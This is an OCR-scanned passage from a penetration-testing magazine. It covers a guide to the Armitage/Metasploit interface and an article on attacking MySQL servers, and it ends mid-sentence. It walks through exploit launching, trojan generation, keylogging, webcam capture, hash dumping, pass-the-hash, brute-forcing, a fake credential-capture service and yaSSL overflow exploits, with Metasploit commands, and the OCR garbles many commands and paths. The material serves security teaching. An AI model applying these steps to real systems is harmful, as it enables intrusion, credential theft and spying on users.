Scan to launch this feature. You may also go to 
Hosts -> MSF Scans to launch these as well. 

These scans work through a pivot and against 
IPv6 hosts as well. These scans do not attempt to 
discover if a host is alive before scanning. To save 
time, you should do host discovery first (e.g. an 
ARP scan, ping sweep, or DNS enumeration) and 
then launch these scans to enumerate the discov- 
ered hosts. 

DNS Enumeration 

Another host discovery option is to enumerate a 
DNS server. Go to Hosts -> DNS Enum to do this. 
Armitage will present a module launcher dialog 
with several options. You will need to set the DO- 
MAIN option to the domain you want to enumerate. 
You may also want to set NS to the IP address of 
the DNS server you're enumerating. 

If you're attacking an IPv6 network, DNS enu- 
meration is one option to discover the IPv6 hosts 
on the network. 

Database Maintenance 

Metasploit logs everything you do to a database. 
Over time your database will become full of stuff. 
If you have a performance problem with Armitage, 
try clearing your database. To do this, go to Hosts 
-> Clear Database. 

Exploitation 
Remote Exploits 

Before you can attack, you must choose your 
weapon. Armitage makes this process easy. Use 
Attacks -> Find Attacks to generate a custom At- 
tack menu for each host. To exploit a host: right- 
click it, navigate to Attack, and choose an exploit. 
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To show the right attacks, make sure the operating 
system is set for the host. 

The Attack menu limits itself to exploits that meet 
a minimum exploit rank of great. Some useful ex- 
ploits are ranked good and they won't show in the 
attack menu. You can launch these using the mod- 
ule browser. 

Use Armitage -> Set Exploit Rank to change the 
minimum exploit rank. 

Optionally, if you'd like to see hosts that are vul- 
nerable to a certain exploit, browse to the exploit in 
the module browser. Right-click the module. Select 
Relevant Targets. Armitage will create a dynamic 
workspace that shows hosts that match the high- 
lighted exploit. Highlight all of the hosts and double- 
click the exploit module to attack all of them at once. 

Which exploit? 

Learning which exploits to use and when comes 
with experience. Some exploits in Metasploit im- 
plement a check function. These check functions 
connect to a host and check if the exploit applies. 
Armitage can use these check functions to help 
you choose the right exploit when there are many 
options. For example, targets listening on port 80 
will show several web application exploits after you 
use Find Attacks. Click the Check exploits menu 
to run the check command against each of these. 
Once all the checks are complete, press Ctrl F and 
search for vulnerable hosts. This will lead you to 
the right exploit (Figure 8). 

Clicking a host and selecting Services is another 
way to find an exploit. If you have NMap scan re- 
sults, look at the information field and guess which 
server software is in use. Use the module brows- 
er to search for any Metasploit modules related to 
that software. One module may help you find infor- 
mation required by another exploit. Apache Tom- 
cat iS an example Of this. The tomcat_mgr_login 

module will search for a username and password 
that you can use. Once you have this, you can 
launch the tomcat mgr depioy exploit to get a shell 
on the host. 

Launching Exploits 

Armitage uses this dialog to launch exploits: Fig- 
ure 9. 
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The exploit launch dialog lets you configure op- 
tions for a module and choose whether to use a 
reverse connect payload. 

Armitage presents options in a table. Double-click 
the value to edit it. If an option requires a filename, 
double-click the option to open up a file chooser di- 
alog. You may also check Show advanced options 
to view and set advanced options. 

If you see SOMETHING + in a table, this means 
you can double-click that item to launch a dialog to 
help you configure its value. This convention applies 
to the module launcher and preferences dialogs. 

Some penetration testers organize their targets 
into text files to make them easier to track. Armit- 
age can make use of these files too. Double-click 
RHOST + and select your targets file. The file must 
contain one IP address per line. This is an easy 
way to launch an attack or action against all of 
those hosts. 

For remote exploits, Armitage chooses your pay- 
load for you. Generally, Armitage will use Inter- 
preter for Windows targets and a command shell 
payload for UNIX targets. 

Click Launch to run the exploit. If the exploit is 
successful, Armitage will make the host red and 
surround it with lightning bolts. Metasploit will also 
print a message to any open consoles. 

Automatic Exploitation 

If manual exploitation fails, you have the hail mary 
option. Attacks -> Hail Mary launches this feature. 
Armitage's Hail Mary feature is a smart db_autop- 
wn. It finds exploits relevant to your targets, filters 
the exploits using known information, and then 
sorts them into an optimal order. 

This feature won't find every possible shell, but 
it's a good option if you don't know what else to try. 

Client-side Exploits 

Through Armitage, you may use Metasploit's cli- 
ent-side exploits. A client-side attack is one that at- 
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Figure 8. Finding the right exploit 



Figure 9. Launching exploits 
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tacks an application and not a remote service. If 
you can't get a remote exploit to work, you'll have 
to use a client-side attack. 

Use the module browser to find and launch cli- 
ent-side exploits. Search for fileformat to find ex- 
ploits that trigger when a user opens a malicious 
file. Search for browser to find exploits that serv- 
er browser attacks from a web server built into 
Metasploit. 

Client-side Exploits and Payloads 

If you launch an individual client-side exploit, you 
have the option of customizing the payload that 
goes with it. Armitage picks same defaults for you. 

In a penetration test, it's usually easy to get 
someone to run your evil package. The hard part is 
to get past network devices that limit outgoing traf- 
fic. For these situations, it helps to know about me- 
terpreter's payload communication options. There 
are payloads that speak HTTP, HTTPS, and even 
communicate to IPv6 hosts. These payloads give 
you options in a tough egress situation. 

To set the payload, double-click PAYLOAD in the 
option column of the module launcher. This will 
open a dialog asking you to choose a payload (Fig- 
ure 10). 

Highlight a payload and click Select. Armitage will 
update the PAYLOAD, DisablePayloadHandler, 
ExitOnSession,LHOST, and LPORT values for 
you. You're welcome to edit these values as you 
see fit. 

If you select the Start a handler for this pay- 
load option, Armitage will set the payload options 
to launch a payload handler when the exploit 
launches. If you did not select this value, you're 
responsible for setting up a multi/handler for the 
payload. 
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Figure 10. Choosing a payload 



Payload Handlers 

Apayload handler is a server that runs in Metasploit. 
Its job is to wait for a payload to connect to your 
Metasploit and establish a session. 

To quickly start a payload handler, navigate to 
Armitage -> Listeners. A bind listener attempts to 
connect to a payload listening for a connection. A 
reverse listener waits for the payload to connect 
back to you. 

You may set up shell listeners to receive connec- 
tions from netcat. 

Go to View -> Jobs to see which handlers are 
running. 

Generate a Payload 

Exploits are great, but don't ignore the simple stuff. 
If you can get a target to run a program, then all 
you need is an executable. Armitage can generate 
an executable from any of Metasploit's payloads. 
Choose a payload in the module browser, double- 
click it, select the type of output, and set your op- 
tions. Once you click launch, a save dialog will ask 
you where to save the file to (Figure 11). 

To create a Windows trojan binary, set the output 
type to exe. Set the Template option to a Windows 
executable. Set KeepTemplateWorking if you'd 
like the template executable to continue to work 
as normal. Make sure you test the resulting binary. 
Some template executables will not yield a work- 
ing executable. 

Remember, if you have a payload, it needs a 
handler. Use the multi/handler output type to cre- 
ate a handler that waits for the payload to connect. 
This option offers more flexibility and payload op- 
tions than the Armitage ->Listeners menu. 

If you plan to start a handler and then generate a 
payload, here's a tip that will save you some time. 
First, configure a multi/handler as described. Hold 
down Shift when you click Launch. This will tell Ar- 
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mitage to keep the module launch dialog open. 
Once your handler is started, change the output 
type to the desired value, and click Launch again. 
This will generate the payload with the same val- 
ues used to create the multi/handler. 

Post Exploitation 
Managing Sessions 

Armitage makes it easy to manage the meterpreter 
agent once you successfully exploit a host. Hosts 
running a meterpreter payload will have a Meter- 
preter N menu for each Meterpreter session (Fig- 
ure 12). 

If you have shell access to a host, you will see 
a Shell N menu for each shell session. Right-click 
the host to access this menu. If you have a Win- 
dows shell session, you may go to Shell N -> Me- 
terpreter to upgrade the session to a Meterpreter 
session. If you have a UNIX shell, go to Shell N -> 
Upload to upload a file using the UNIX printf com- 
mand. 

Privilege Escalation 

Some exploits result in administrative access to 
the host. Other times, you need to escalate privi- 
leges yourself. To do this, use the Meterpreter N -> 
Access -> Escalate Privileges menu. This will high- 
light the privilege escalation modules in the mod- 
ule browser. 

Try the getsystem post module against Windows 
XP/2003 era hosts. 

Token Stealing 

Another privilege escalation option is token steal- 
ing. When a user logs onto a Windows host, a to- 
ken is generated and acts like a temporary cookie 




Figure 12. Meterpreter menu 



to save the user the trouble of retyping their pass- 
word when they try to access different resources. 
Tokens persist until a reboot. You may steal these 
tokens to assume the rights of that user. 

To see which tokens are available to you, go to 
Meterpreter N -> Access -> Steal Token. Armitage 
will present a list of tokens to you. Click Steal To- 
ken to steal one. 

If you want to revert to your original token, press 
Revert to Self. The Get UID button shows your cur- 
rent user ID. 

Session Passing 

Once you exploit a host, duplicating your access 
should be a first priority. Meterpreter N -> Access 
-> Pass Session will inject meterpreter into mem- 
ory and execute it for you. By default this option is 
configured to call back to Armitage's default Meter- 
preter listener. Just click Launch. 

You may also use Pass Session to send Meter- 
preter to a friend. Set LPORT and LHOST to the 
values of their Meterpreter multi/handler. 

If your friend uses Armitage, have them type 
set in a Console tab and report the LHOST and 
LPORT values to you. These are the values for 
their default Meterpreter listener. 

File Browser 

Meterpreter gives you several options for explor- 
ing a host once you've exploited it. One of them is 
the file browser. This tool will let you upload, down- 
load, and delete files. Visit Meterpreter N -> Ex- 
plore -> Browse Files to access the File Browser. 

Right-click a file to download or delete it. If you 
want to delete a directory, make sure it's empty first. 

You may download entire folders or individu- 
al files. Go to View -> Downloads to access your 
downloaded files. 

If you have system privileges, you may modify 
the file timestamps using the File Browser. Right- 
click a file or directory and go to the Timestamp 
menu. This features works like a clipboard. Use 
Get MACE Values to capture the timestamps of 
the current file. Right-click another file and use Set 
MACE Values to update the timestamps of that file. 

Command Shell 

You can reach a command shell for a host through 
Meterpreter N -> Interact -> Command Shell. The 
Meterpreter shell is also available under the same 
parent menu. 

Navigating to the Meterpreter N menu for each 
action gets old fast. Right-click inside the Meter- 
preter shell window to see the Meterpreter N menu 
items right away. 
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Close the command shell tab to kill the process 
associated with the command shell. 

VNC 

To interact with a desktop on a target host, go to 
Meterpreter N -> Interact -> Desktop (VNC). This 
will stage a VNC server into the memory of the 
current process and tunnel the connection through 
Meterpreter. Armitage will provide you the details 
to connect a local VNC client to your target. 

Screenshots and Webcam Spying 

To grab a screenshot use Meterpreter N -> Explore 
-> Screenshot. There is a Webcam Shot option in 
the same location. This option snaps a frame from 
the user's webcam. 

Right-click a screenshot or webcam shot image 
to change the zoom for the tab. This zoom prefer- 
ence will stay, even if you refresh the image. Click 
Refresh to update the screenshot or grab another 
frame from the webcam. ClickWatch (10s) to auto- 
matically snap a picture every ten seconds. 

Process Management and Key Logging 

Go to Meterpreter N -> Explore -> Show Process- 
es to see a list of processes on your victim. Use Kill 
to kill the highlighted processes. 

Meterpreter runs in memory. It's possible to move 
Meterpreter from one process to another. This is 
called migration. Highlight a process and click Mi- 
grate to migrate to another process. Your session 
will have the permissions of that process. 

While in a process, it's also possible to see key- 
strokes from the vantage point of that process. 
Highlight a process and click Log Keystrokes to 
launch a module that migrates meterpreter and 
starts capturing keystrokes. If you key log from 
explorer.exe you will see all of the keys the user 
types on their desktop. 

If you choose to migrate a process for the pur- 
pose of key logging, you should duplicate your 
session first. If the process Meterpreter lives in 
closes, your session will go away. 

Post-exploitation Modules 

Metasploit has several post-exploitation mod- 
ules too. Navigate the post branch in the mod- 
ule browser. Double-click a module and Armitage 
will show a launch dialog. Armitage will populate 
the module's SESSION variable if a compromised 
host is highlighted. Each post-exploitation module 
will execute in its own tab and present its output 
to you there. 

To find out which post modules apply for a ses- 
sion: right-click a compromised host and navigate 



to Meterpreter N ->Explore -> Post Modules or 
Shell N -> Post Modules. Clicking this menu item 
will show all applicable post modules in the mod- 
ule browser. 

Metasploit saves post-exploitation data into a 
Loot database. To view this data go to View -> Loot. 

You may highlight multiple hosts and Armit- 
age will attempt to run the selected post module 
against all of them. Armitage will open a new tab 
for the post module output of each session. This 
may lead to a lot of tabs. Hold down shift and click 
X on one of the tabs to close all tabs with the same 
name. 

Maneuver 
Pivoting 

Metasploit can launch attacks from a compromised 
host and receive sessions on the same host. This 
ability is called pivoting. 

To create a pivot, go to Meterpreter N -> Pivoting 
-> Setup.... A dialog will ask you to choose which 
subnet you want to pivot through the session. 

Once you've set up pivoting, Armitage will draw 
a green line from the pivot host to all targets reach- 
able by the pivot you created. The line will become 
bright green when the pivot is in use. 

To use a pivot host for a reverse connection, set 
the LHOST option in the exploit launch dialog to 
the IP address of the pivot host. 

Scanning and External Tools 

Once you accessed a host, it's good to explore and 
see what else is on the same network. If you've set 
up pivoting, Metasploit will tunnel TCP connections 
to eligible hosts through the pivot host. These con- 
nections must come from Metasploit. 

To find hosts on the same network as a compro- 
mised host, right-click the compromised host and 
go to Meterpreter N-> ARP Scan or Ping Sweep. 
This will show you which hosts are alive. Highlight 
the hosts that appear, right-click, and select Scan 
to scan these hosts using Armitage's MSF Scan 
feature. These scans will honor the pivot you set 
up. 

External tools (e.g., nmap) will not use the pivots 
you've set up. You may use your pivots with exter- 
nal tools through a SOCKS proxy though. Go to 
Armitage -> SOCKS Proxy... to launch the SOCKS 
proxy server. 

The SOCKS4 proxy server is one of the most 
useful features in Metasploit. Launch this option 
and you can set up your web browser to con- 
nect to websites through Metasploit. This allows 
you to browse internal sites on a network like 
you're local. You may also configure proxychains 
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on Linux to use almost any program through a 
proxy pivot. 

Password Hashes 

To collect Windows password hashes, visit Inter- 
preter N -> Access -> Dump Hashes. You need ad- 
ministrative privileges to do this. 

There are two hash dumping options. One is the 
Isass method and the other is the registry method. 
The Isass method attempts to grab the password 
hashes from memory. This option works well against 
Windows XP/2003 era hosts. The registry method 
works well against modern Windows systems. 

You may view collected hashes through View -> 
Credentials. For your cracking pleasure, the Ex- 
port button in this tab will export credentials in pw- 
dump format. You may also use the Crack Pass- 
words button to run John the Ripper against the 
hashes in the credentials database. 

Pass-the-Hash 

When you login to a Windows host, your password 
is hashed and compared to a stored hash of your 
password. If they match, you're in. When you at- 
tempt to access a resource on the same Windows 
domain, the stored hash is sent to the other host 
and used to authenticate you. With access to these 
hashes, you can use this mechanism to take over 
other hosts on the same domain. This is called a 
pass-the-hash attack. 

Use Login -> psexec to attempt a pass-the-hash 
attack against another Windows host. Click Check 
all Credentials to have Armitage try all hashes and 
credentials against the host. 

The pass-the-hash attack attempts to upload a 
file and create a service that immediately runs. 
Only administrator users can do this. Further, your 
targets must be on the same active directory do- 
main for this attack to work. 

Using Credentials 

Armitage will create a Login menu on each host 
with known services. Right-click a host and nav- 
igate to Login ->service. This will open a dialog 
where you may choose a username and password 
from the credentials known to Metasploit. 

Some services (e.g. telnet and ssh) will give you 
a session when a login succeeds. Others will not. 

Check the Try all credentials option and 
Metasploit will login to the service with each of the 
known credentials. Metasploit automatically adds 
each successful login to the credentials table for 
you. 

The best way into a network is through valid cre- 
dentials. Remember that a successful username/ 



password combination from one service may give 
you access to another host that you couldn't ex- 
ploit. 

Password Brute Force 

Metasploit can attempt to guess a username and 
password for a service for you. This capability is 
easy to use through the module browser. 

Metasploit supports brute forcing through the 
auxiliary modules named servicejogin. Type login 
in the module browser to search for them. 

To brute force a username and password over 
SSH, browse to auxiliary/scanner/ssh/ssh_login in 
the modules panel and double-click it. 

If you know the username, set the USERNAME 
variable. If you'd like Metasploit to brute force the 
username, select a value for USER_FILE. Dou- 
ble-click the USER_FILE variable to bring up a file 
chooser where you can select a text file containing 
a list of usernames. 

Metasploit has many files related to brute forcing 
in the [metasploit install]/data/word lists directory. 

Set the PASS_FILE variable to a text file contain- 
ing a list of passwords to try. 

If you're only brute forcing one host and you have 
a lot of usernames/passwords to try, I recommend 
using an external tool like Hydra. Metasploit does 
not make several parallel connections to a single 
host to speed up the process. This lesson can be 
taken one step further - use the right tool for each 
job. 

Remote Metasploit 
Remote Connections 

You can use Armitage to connect to an existing 
Metasploit instance on another host. Working with 
a remote Metasploit instance is similar to working 
with a local instance. Some Armitage features re- 
quire read and write access to local files to work. 
Armitage's deconfliction server adds these fea- 
tures and makes it possible for Armitage clients to 
use Metaspoit remotely. 

Connecting to a remote Metasploit requires start- 
ing a Metasploit RPC server and Armitage's de- 




Figure 13. Your usage of Metasploit with Metasploit RPC 
server and Armitage's deconfliction server 
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confliction server. With these two servers set up, 
your use of Metasploit will look like this diagram: 
Figure 13. 

Multi-Player Metasploit Setup 

The Armitage Linux package comes with a team- 
server script that you may use to start Metasploit's 
RPC daemon and Armitage's deconfliction server 
with one command. To run it: 

cd /path/ to/me tasploit/msf 3 /data /armitage 
./teamserver [external IP address] [password] 

This script assumes armitage.jar is in the cur- 
rent folder. Make sure the external IP address is 
correct (Armitage doesn't check it) and that your 
team can reach port 55553 on your attack host. 
That's it. 

Metasploit's RPC daemon and the Armitage de- 
confliction server are not GUI programs. You may 
run these over SSH. 

The Armitage team server communicates over 
SSL. When you start the team server, it will pres- 
ent a server fingerprint. This is a SHA-1 hash of the 
server's SSL certificate. When your team members 
connect, Armitage will present the hash of the cer- 
tificate the server presented to them. They should 
verify that these hashes match. 

Do not connect to 127.0.0.1 when a teamserv- 
er is running. Armitage uses the IP address you're 
connecting to determine whether it should use SSL 
(teamserver, remote address) or non-SSL (msfr- 
pcd, localhost). You may connect Armitage to your 
teamserver locally, use the [external IP address] in 
the Host field. 

Armitage's red team collaboration setup is CPU 
sensitive and it likes RAM. Make sure you have 
1 .5GB of RAM in your team server. 



Multi-Player Metasploit 

Armitage's red team collaboration mode adds a 
few new features. These are described here: 

View -> Event Log opens a shared event log. 
You may type into this log and communicate as 
if you're using an IRC chat room. In a penetration 
test this event log will help you reconstruct major 
events (Figure 14). 

Multiple users may use any Meterpreter ses- 
sion at the same time. Each user may open one 
or more command shells, browse files, and take 
screenshots of the compromised host. 

Metasploit shell sessions are automatically 
locked and unlocked when in use. If another user 
is interacting with a shell, Armitage will warn you 
that it's in use. 

Some Metasploit modules require you to spec- 
ify one or more files. If a file option has a + next 
to it, then you may double-click that option name 
to choose a local file to use. Armitage will upload 
the chosen local file and set the option to its re- 
mote location for you. Generally, Armitage will do 
its best to move files between you and the shared 
Metasploit server to create the illusion that you're 
using Metasploit locally. 

Penetration testers will find this feature invalu- 
able. Imagine you're working on a pen test and 
come across a system you don't know much 
about. You can reach back to your company and 
ask your local expert to load Armitage and con- 
nect to the same Metasploit instance. They will 
immediately have access to your scan data and 
they can interact with your existing sessions... 
seamlessly. 

Or, imagine that you're simulating a phishing at- 
tack and you get access to a host. Your whole 
team can now work on the same host. One per- 
son can search for data, another can set up a piv- 
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ot and search for internal hosts to attack, and an- 
other can work on persistence. The sky is the limit 
here. 

Some meterpreter commands may have short- 
ened output. Multi-player Armitage takes the initial 
output from a command and delivers it to the cli- 
ent that sent the command. Additional output is ig- 
nored (although the command still executes nor- 
mally). This limitation primarily affects long running 
meterpreter scripts. 

Scripting Armitage 
Cortana 

Armitage includes Cortana, a scripting technolo- 
gy developed through DARPAs Cyber Fast Track 
program. With Cortana, you may write red team 
bots and extend Armitage with new features. You 
may also make use of scripts written by others. 

Cortana is based on Sleep, an extensible Perl- 
like language. Cortana scripts have a .cna suffix. 

Read the Cortana Tutorial to learn more about 
how to develop bots and extend Armitage (Figure 
15). 

Stand-alone Bots 

A stand-alone version of Cortana is distributed with 
Armitage. You may connect the stand-alone Cor- 
tana interpreter to an Armitage team server. 

Here's a helloworld. cna Cortana script: 

on ready { println ("Hello World! ") ; quit(); } 

To run this script, you will need to start Corta- 
na. First, stand-alone Cortana must connect to a 
team server. The team server is required because 
Cortana bots are another red team member. 




Figure 15. The Cortana Tutorial 



Resources 

Cortana is a full featured environment for developing 
red team bots and extending Armitage. If you'd like to 
learn more, take a look at the following resources: 

• Cortana Tutorial for Scripters 

• Public Cortana Script Repository 

• Sleep Manual 



If you want to connect multiple users to 
Metasploit, you have to start a team server. 

Next, you will need to create a connect.prop file 
to tell Cortana how to connect to the team server 
you started. Here's an example connect.prop file: 

host=127 . 0 . 0 . 1 port=55553 user=msf pass=password 
nick=MyBot 

Now, to launch your bot: 

cd /path/ to/metasploit/msf 3 /data/ armitage 

java -jar cortana. jar connect.prop helloworld . cna 

Script Management 

You don't have to run Cortana bots stand-alone. 
You may load any bot into Armitage directly. When 
you load a bot into Armitage, you do not need to 
start a teamserver. Armitage is able to deconflict its 
actions from any loaded bots on its own. 

You may also use Cortana scripts to extend Ar- 
mitage and add new features to it. Cortana scripts 
may define keyboard shortcuts, insert menus into 
Armitage, and create simple user interfaces. 

To load a script into Armitage, go to Armitage 
-> Scripts. Press Load and choose the script you 
would like to load. Scripts loaded in this way will be 
available each time Armitage starts. 

Output generated by bots and Cortana com- 
mands are available in the Cortana console. Go to 
View -> Script Console. 



MICHAEL BOMAN 

H Michael Boman is a penetration tester by 
day and a malware researcher by night. 
Michael has more than 10 years experi- 
ence in security testing of applications 
and infrastructure. He also deliver cours- 
es in security testing and secure develop- 
ment. Michael is passionate about computer security 
and doing his best so that more people do it right from 
start. You can find him at his website http://michaelbo- 
man.org where he tries to share his experiences when- 
ever he can. 
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EXPLORING DATABASE 



How to use Sqiploit 



Databases nowdays are everywhere, from the smallest desktop 
applications to the largest web sites such as Facebook. Critical 
business information are stored in database servers that are often 
poorly secured. 



Someone an to this information could have 
control over a company's or an organiza- 
tion's infrastructure. He could even sell this 
information to a company's competitors. Imagine 
the damage that something like this could cause. In 
this article, we will see how we can use Metasploit 
to attack our database servers. 

Metasploit is a very powerful tool. Actually, is 
not just a tool, it is a collection of tools. It is a 
whole framework. It has gained incredible popu- 
larity in the last few years because of its success 
in the fields of penetration testing and informa- 
tion security. It includes various tools, from vari- 
ous scanners to exploits. It can be used to dis- 
cover software vulnerabilities and exploit them. 
With database servers having so many security 
weaknesses, Metasploit has numerous auxilia- 
ry modules and exploits to assist you with your 
database server penetration testing. Metasploit 
is available for all popular operating systems 
so what operating system you are already us- 
ing might not be a problem. In this article we are 
going to use Metasploit's auxiliary modules and 
exploits to complete various penetration testing 
tasks against popular database servers, such as 
Microsoft SQL Server and MySQL. I hope you en- 
joy it! 

Attacking a MySQL Database Server 

MySQL is the world's most used open source re- 
lational database management system. Its source 



code is available under the terms of the GNU Gen- 
eral Public License and other proprietary license 
agreements. MySQL is the first database choice 
when it comes to open source applications cre- 
ation. MySQL is a very secure database system, 
but as with any software that is publicly accessible, 
you can't take anything for granted. 

Discover open MySQL ports 

MySQL is running by default on port 3306. To dis- 
cover MySQL you can do it either with nmap or 
with Metasploit's auxiliary modules. 

The NMAP way 

Nmap is a free and open source network discovery 
and security auditing utility. It can discover open 
ports, running services, operating system version 
and much more. To discover open MySQL ports 
we use it in this way: 



nmap -sT -sV -Pn -p 3306 192.168.200.133 




Figure 1 . Discovering MySQL servers - The nmap way 
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Parameters: 

-sT: TCP connect scan 

-sV: Determine Service version information 

-Pn: Ignore Host discovery 

-p 3306: Scan port 3306 

Scanning the whole network: 

nmap -sT -sV -Pn --open -p 3306 192.168.200.0/24 

Parameters: 

-open: Show only open ports (Figure 2) 
The Metasploit way 

Metasploit offers auxiliary module mysqi version. 
This module enumerates the version of running 
MySQL servers. To use it type: 

use auxiliary/ scanner/mysql/mysql_version 

To use this scanner you have to set its options. Type: 

show options 
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Figure 2. Discovering MySQL servers - The nmap way 
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Figure 3. mysql_version auxiliary module options 
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To see a list of available options (Figure 3). 
Set the RHOSTS parameter: 

set RHOSTS 192.168.200.133 



or 



set RHOSTS 192.168.200.0/24 

Set the RPORT parameter to a different value if 
you believe that the MySQL Server is listening on 
a different port: 

Set RPORT 3333 

Increase THREADS value for a faster scanning 
(Figure 4): 

set THREADS 50 

Now, all you have to type is: 



and hit enter (Figure 5). 

As you can see from the screenshot we have a 
MySQL version 5.0.51a running at 192.168.200.133! 

Brute forcing MySQL 

There is an auxiliary module in Metasploit 
called mysql login which will happily que- 
ry a mysql server for specific usernames and 
passwords. The options for this module are: 
Figure 6. 




Figure 5. mysql_version scanner in action 




Figure 4. mysql_version options after setting them up 



Figure 6. mysqljogin module options 
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To start your attack you have to set the RHOSTS 
option and choose a username and a password. 



SET RHOSTS 192.168.200.133 



SET USERNAME root 



Leave the password blank. Your options, after ex- 
ecuting the commands above, should seem like 
Figure 6. mysqi _ login will try to login with blank 
password and with the username as the pass- 
word. Maybe we are lucky before we start brute- 
forcing database with passwords lists (Figure 7). 

We were lucky! The administrator is completely 
ignorant. But what if we weren't so lucky? We then 
need a password list file. We can create one by 
ourselves or download one from the Internet. Let's 
create one! 

Creating a password list 

To create our password list we are going to use 
crunch. If you are using BackTrack, crunch is al- 
ready installed. Open Privilege Escalation > Pass- 
word Attacks > Offline Attacks > crunch. Otherwise 
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Figure 7. Starting brute-forcing database with passwords lists 
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Figure 8. Generating a password list with crunch 
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download it from here http://sourceforge.net/proj- 
ects/crunch-wordlist/. 
Execute: 

./crunch 6 8 abcdel23456 -o passfile.lst 

The above command will create passwords be- 
tween 6 and 8 characters long, consisting of ascii 
characters a,b,c,d,e and numbers 1,2,3,4,5,6 and 
will save the list into file passfile.lst (Figure 8). 

Using password lists 

Now that we have our password list stored in / 

pentest/passwords/crunch/passf ile . 1st, We Can 

use it in mysqi iogin module. 

Set PASS_FILE /pentest/passwords/crunch/passfile . 1st 

Increase also the number of concurrent threads 
for a faster brute-force attack. 

SET THREADS 50 
run 

mysqi _ login (Figure 9) module offers 2 other op- 
tions, user file and userpass file. You can use 
a username file list to try various username values 
by setting the user _ file option accordingly. With 
userpass _ file parameter you can use a file which 
contains both usernames and passwords in the 
same file separated by space and one pair per line. 

Bypass MySQL Authentication 

Module mysql_authbypass_hashdump exploits a 

password bypass vulnerability in MySQL and 




Figure 10. Running mysql_authbypass_hashdump module 




Figure 9. mysqi brute-force attack using password list 



Figure 11. mysqi server hashes and usernames 
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can extract usernames and encrypted passwords 
hashes from a MySQL server. To select it type: 

use auxiliary/ scanner/mysql/mysql_hashdump 



Unix, Windows, DOS, BeOS, and OpenVMS. Its 
primary purpose is to detect weak Unix passwords. 
After having acquired mysql hashes with m yS qi_ 
hashdump module, load jtr mysql fast module 
and run it. 



Set RHOSTS and THREADS option: 

set RHOSTS 192.168.200.133 
set THREADS 50 

and run the module. We can also set parameter 
username. 

set username root 

Unlucky! (Figure 10) 

Dump MySQL Password Hashes 

mysqi hashdump extracts the usernames and en- 
crypted password hashes from a MySQL serv- 
er. One can then use jtr mysqi fast module to 
crack them. The module is located in auxiliary/ 

scanner/mysql. To USe it Set RHOSTS Option to 

our target's IP address and increase THREADS 
value. If you have managed to reveal root pass- 
word then set also options USERNAME and 
PASSWORD. Run the module to get your pre- 
cious results! (Figure 11) 

Cracking passwords with John The Ripper 

Metasploit offers module jtr mysqi fast.This 
module uses John the Ripper to identify weak 
passwords that have been acquired from the 
mysqi hashdump module. John the Ripper is a 
free and Open Source software password crack- 
er, available for many operating systems such as 




Figure M.jtr_mysql_fast module options 




Figure 13. mysql capture module options 
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use auxiliary /analyze/ j tr_mysql_f ast 
run 

This module offers options such as setting a cus- 
tom path for john the ripper. The option that in- 
terests you the most is the Wordlist option, which 
is a path to your desired password list (Figure 
12). 

Getting the schema 

A database schema describes in a formal language 
the structure of the database, the organization of 
the data, how the tables, their fields and relation- 
ships between them must be defined and more. 
In general, database schema defines the way the 
database should be constructed. Metasploit has 
the module mysqi schemadump to get MySQL sche- 
ma. mysql_schemadump is located Under auxiliary/ 

scanner/mysqi. To use it you have to set RHOSTS, 
USERNAME and PASSWORD options. If you are 
scanning more than one hosts increase THREADS 
value! 

Let's go Phishing 

Phishing is an attempt to steal sensitive infor- 
mation by impersonating a well known organiza- 
tion. In the same manner you can trick a user to 
steal her MySQL credentials. One of the abilities 
of Metasploit is this, mimic known services and 
capture user credentials. Among the various cap- 
ture modules there is a module called mysql. This 
module provides a fake MySQL service that is de- 
signed to capture MySQL server authentication 
credentials. It captures challenge and response 
pairs that can be supplied to Cain or John the Rip- 
per for cracking. 
To select the capture module type: 

use auxiliary/ server/ capture/mysql 

This module offers some interesting options. 
You can set CAINPWFILE option to store cap- 
tured hashes in Cain&Abel format or JOHNPW- 
FILE to store hashes in John The Ripper format. 
Leave SRVHOST option as it is, 0.0.0.0, to listen 
on the local host. You can also set the SRVVER- 
SION option, which is the version of the mysql 
server that will be reported to clients in the greet- 
ing response. This option must agree with the true 
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mysql server version on the network if you don't 
want to being detected. You can also configure 
the module to use SSL! (Figure 13) 

Run the module and connect to the capture mysql 
server from another computer on the network to 
see how it is working. To connect to a mysql server 
open a terminal and type: 

mysql -h ip_address -u root -p 

Enter any password, for now, in mysql's prompt 
and see what is happening in Metasploit! (Figure 
14) 

Metasploit has captured the hash and now this 
hash is stored in cain and john format in files /tmp/ 
j ohn and /tmp/cain. These are the files that I have 
chosen. 

Cain Format 

root NULL 

94e243cab3181cvef73852s3011651369196a928 

1122 634475697088 99agbbf cddnef f 2113434455 SHA1 

John format 

root:$mysqlna$11122 634 47 5697 08899agbb 
fcddneff2113434455 * 

94e243cab3181cvef73852s3011651369196a928 




Figure 14. mysql capture module in action 




Figure 15. Exploit's and payload's options 
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Figure 16. mysql_yassl_hello exploit payloads 



MySQL Exploiting 

MySQL database system is a very secure piece 
of software. Metasploit doesn't offer many MySQL 
exploits. Although some exploits exist. 

YaSSL Exploits 

YaSSL is a lightweight embedded SSL library. 
Metasploit offers 2 exploits for this library. The 

mysql yassl getname and the mysql yassl hello. 
The mysql yassl getname exploits 3 Stack buffer 

overflow in the yaSSL 1 .9.8 and earlier and m yS qi_ 
yassi heiio exploits a stack buffer overflow in the 
yaSSL 1.7.5 and earlier. To use any exploit you 
have to select it: 

use exploit /linux /mysql /mysql_yassl_get name 
use exploit /linux /mysql /mysql_yassl_hello 
use exploit /windows /mysql /mysql_yassl_hello 

As you can figure, the last exploit is for windows 
systems. After selecting your desired exploit, 
you have to select the payload. Each exploit of- 
fers a variety of payloads. You have to choose 
the most suitable for your target. To see a list 
of available payloads for the exploit type (Fig- 
ure 15): 

show payloads 

The most successful exploits usually are the 
reverse tcp payloads where the target machine 
connects back to you. Each payload offers some 
options. By typing 

show options 

you will see exploit's and payload's options (Fig- 
ure 16). 

Other MySQL Exploits 

We should mention here two more exploits that are 
available for MySQL systems that run on Windows 

Servers. The mysql_payload and the scrutinizer_ 

upioad exec. The first exploit, mysqi payioad, cre- 
ates and enables a custom UDF on the target. On 
default Microsoft Windows installations of MySQL 
5.5.9 and earlier, directory write permissions are 
not enforced, and the MySQL service runs as Lo- 
calSystem. This module will leave a payload ex- 
ecutable on the target system and the UDF DLL, 
and will define or redefine sys evaio and sys_ 

exec functions. The scrutinizer upload exec 

module exploits an insecure config found in Scru- 
tinizer NetFlow & sFlow Analyzer, a network traffic 
monitoring and analysis tool. By default, the soft- 
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ware installs a default password in MySQL, and 
binds the service to "0.0.0.0". This allows any re- 
